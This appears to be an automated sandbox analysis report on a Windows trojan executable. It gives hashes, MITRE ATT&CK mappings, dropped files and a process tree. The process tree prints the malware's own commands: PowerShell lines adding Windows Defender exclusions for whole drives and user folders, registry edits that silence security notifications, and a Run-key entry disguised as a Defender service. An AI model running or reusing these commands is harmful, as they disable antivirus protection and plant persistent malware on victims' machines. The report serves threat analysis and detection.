515d4efa87e4dc9103d0d3f42c2b241177e6a5436be06b7f2cff9211be6ea1a6

Analysis

max time kernel
119s
max time network
131s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-11-2024 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe
Size

4.6MB
MD5

c7620b77d05f9dac8105469b7d0c854f
SHA1

5368819b5aa8db1ee7f5cc5b4b50ecb6aa6faf55
SHA256

202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10
SHA512

0fb1e57e2fd053bacbba7a0aabc00c162432c33a9332bac2c45036173fccbe5bebc2906568d2facea4fcf0963dcfcb557bff932dbb2dc2ec5b8cd736213101d3
SSDEEP

98304:I1qaURDb8PNfMVNnlqKL0T/46KhPLQYVVW4G1jOUc/hItwGn:I1zsf8PNfkl/m4zdLQYPZGNI/hmVn

Score

10^/10

evasion execution persistence trojan

Malware Config

Signatures

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2360	powershell.exe
2024	powershell.exe
2924	powershell.exe
2876	powershell.exe
3040	powershell.exe
2892	powershell.exe

Disables Task Manager via registry modification
evasion

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\DEFENDERSERVICE = "C:\\Users\\Admin\\AppData\\Local\\NEWDRIVERS2\\WindowsDefender.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1560	reg.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2876	powershell.exe
3040	powershell.exe
2892	powershell.exe
2360	powershell.exe
2024	powershell.exe
2924	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.execmd.exe

description	pid	Process	procid_target
PID 1276 wrote to memory of 2008	1276	202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe	30
PID 1276 wrote to memory of 2008	1276	202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe	30
PID 1276 wrote to memory of 2008	1276	202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe	30
PID 2008 wrote to memory of 2876	2008	cmd.exe	32
PID 2008 wrote to memory of 2876	2008	cmd.exe	32
PID 2008 wrote to memory of 2876	2008	cmd.exe	32
PID 2008 wrote to memory of 3040	2008	cmd.exe	33
PID 2008 wrote to memory of 3040	2008	cmd.exe	33
PID 2008 wrote to memory of 3040	2008	cmd.exe	33
PID 2008 wrote to memory of 2892	2008	cmd.exe	34
PID 2008 wrote to memory of 2892	2008	cmd.exe	34
PID 2008 wrote to memory of 2892	2008	cmd.exe	34
PID 2008 wrote to memory of 2360	2008	cmd.exe	35
PID 2008 wrote to memory of 2360	2008	cmd.exe	35
PID 2008 wrote to memory of 2360	2008	cmd.exe	35
PID 2008 wrote to memory of 2024	2008	cmd.exe	36
PID 2008 wrote to memory of 2024	2008	cmd.exe	36
PID 2008 wrote to memory of 2024	2008	cmd.exe	36
PID 2008 wrote to memory of 2924	2008	cmd.exe	37
PID 2008 wrote to memory of 2924	2008	cmd.exe	37
PID 2008 wrote to memory of 2924	2008	cmd.exe	37
PID 2008 wrote to memory of 1676	2008	cmd.exe	38
PID 2008 wrote to memory of 1676	2008	cmd.exe	38
PID 2008 wrote to memory of 1676	2008	cmd.exe	38
PID 2008 wrote to memory of 1680	2008	cmd.exe	39
PID 2008 wrote to memory of 1680	2008	cmd.exe	39
PID 2008 wrote to memory of 1680	2008	cmd.exe	39
PID 2008 wrote to memory of 2844	2008	cmd.exe	40
PID 2008 wrote to memory of 2844	2008	cmd.exe	40
PID 2008 wrote to memory of 2844	2008	cmd.exe	40
PID 2008 wrote to memory of 1560	2008	cmd.exe	41
PID 2008 wrote to memory of 1560	2008	cmd.exe	41
PID 2008 wrote to memory of 1560	2008	cmd.exe	41
PID 2008 wrote to memory of 2976	2008	cmd.exe	42
PID 2008 wrote to memory of 2976	2008	cmd.exe	42
PID 2008 wrote to memory of 2976	2008	cmd.exe	42

C:\Users\Admin\AppData\Local\Temp\202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe
"C:\Users\Admin\AppData\Local\Temp\202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1276
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\NEWDRIVERS2\1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "D:"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:/NEWDRIVERS"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\NEWDRIVERS2"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2924
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v DisableTaskMgr /t REG_DWORD /d 0
    3⤵
    PID:1676
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /f /v DisableNotificationCenter /t REG_DWORD /d 1
    3⤵
    PID:1680
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /f /v DisableEnhancedNotifications /t REG_DWORD /d 1
    3⤵
    - Modifies Windows Defender notification settings
    PID:2844
- - C:\Windows\system32\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v DEFENDERSERVICE /t REG_SZ /d "C:\Users\Admin\AppData\Local\NEWDRIVERS2\WindowsDefender.exe"
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\NEWDRIVERS2\rar.bat
    3⤵
    PID:2976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\NEWDRIVERS2\1.bat

Filesize
3KB

MD5
d3c39da2d7207deda43b50b864d711a6

SHA1
524e21299fbd42ec1a615a5d67117312996c7922

SHA256
8f803b854c5ae49b6529e08a507a575b695adf826d995ecddd55a315e12d8da7

SHA512
f9e1337a2bf229bc454ff1972b50886baac93ea5f4bb0f8482eb4f9aa1183876973cc00ff9bc19e0cd067576e71224f70de9d27b04407087be5ef89180518cc7

Download Submit
C:\Users\Admin\AppData\Local\NEWDRIVERS2\rar.bat

Filesize
351B

MD5
ce7ef89a43335bb80b9e9b0b67d1a904

SHA1
d1abb8760f3f95744c457825ce89a6686dd094d6

SHA256
8819312c4d6d83836551a96f3ba8f793db1b6caf573a4fdfc1f26cfc71a3116f

SHA512
b03e4f0a3fb727a63583699e7b8a4735edc607d00ada573bc8c7eb6e03a3c386fbc94610a80ea78df857f345f2756a8bdd2e42e6236911f214ee15bf92984ac0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
54dd9b0fc19e0dd54114476ade307b21

SHA1
a7374bd4cfdff10cbe7fbc2c1bad27e9caa72fdd

SHA256
d26aabf3fa1cb0177be61d28c13b452d7fa9d8d9662c98df1ce6e7a39bef8487

SHA512
30420b8a8751b3cde519f47ff8f788a9ef4764ecac454e96a6b4aaa4804b7cf2a3eb5160a32aba96684bbfab050c448b996f35f41d09ca049cfbfa8216599e2b

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2876-29-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-28-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-27-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-30-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-31-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-32-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-26-0x0000000002960000-0x0000000002968000-memory.dmp

Filesize
32KB

Download
memory/2876-25-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2876-24-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmp

Filesize
4KB

Download
memory/3040-38-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/3040-39-0x0000000000540000-0x0000000000548000-memory.dmp

Filesize
32KB

Download